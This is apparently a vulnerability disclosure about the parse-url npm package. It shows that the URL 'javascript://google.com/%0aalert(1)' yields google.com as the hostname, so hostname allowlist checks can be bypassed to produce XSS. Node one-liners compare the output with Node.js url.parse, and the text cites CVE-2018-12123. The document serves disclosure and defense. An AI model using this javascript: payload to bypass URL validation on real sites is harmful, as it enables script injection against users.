Using parse-url for a security check on a URL is dangerous, because the hostname can be spoofed through the javascript: scheme. The same issue existed in url.parse() of Node.js in 2018; Node.js acknowledged it as a vulnerability, patched it in a security release, and a CVE was issued for it afterwards.
sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
protocol: 'javascript:',
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: null,
query: null,
pathname: '//google.com/%0aalert(1)',
path: '//google.com/%0aalert(1)',
href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$
First of all, the result above is from url.parse() of Node.js. For the javascript: scheme, what looks like a hostname (google.com) is treated as part of the path, and hostname stays null.
sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
protocols: [ 'javascript' ],
protocol: 'javascript',
port: null,
resource: 'google.com',
user: '',
pathname: '/%0aalert(1)',
hash: '',
search: '',
href: 'javascript://google.com/%0aalert(1)',
query: [Object: null prototype] {}
}
sh-3.2$
parse-url, however, behaves differently from Node.js: it extracts google.com as the resource (hostname) even though the scheme is javascript:. A check that only compares the parsed hostname against an allowlist therefore accepts javascript://google.com/%0aalert(1); when that URL is navigated to, the browser decodes %0a to a newline, so //google.com/ becomes a JavaScript comment and alert(1) executes.
Refer to CVE-2018-12123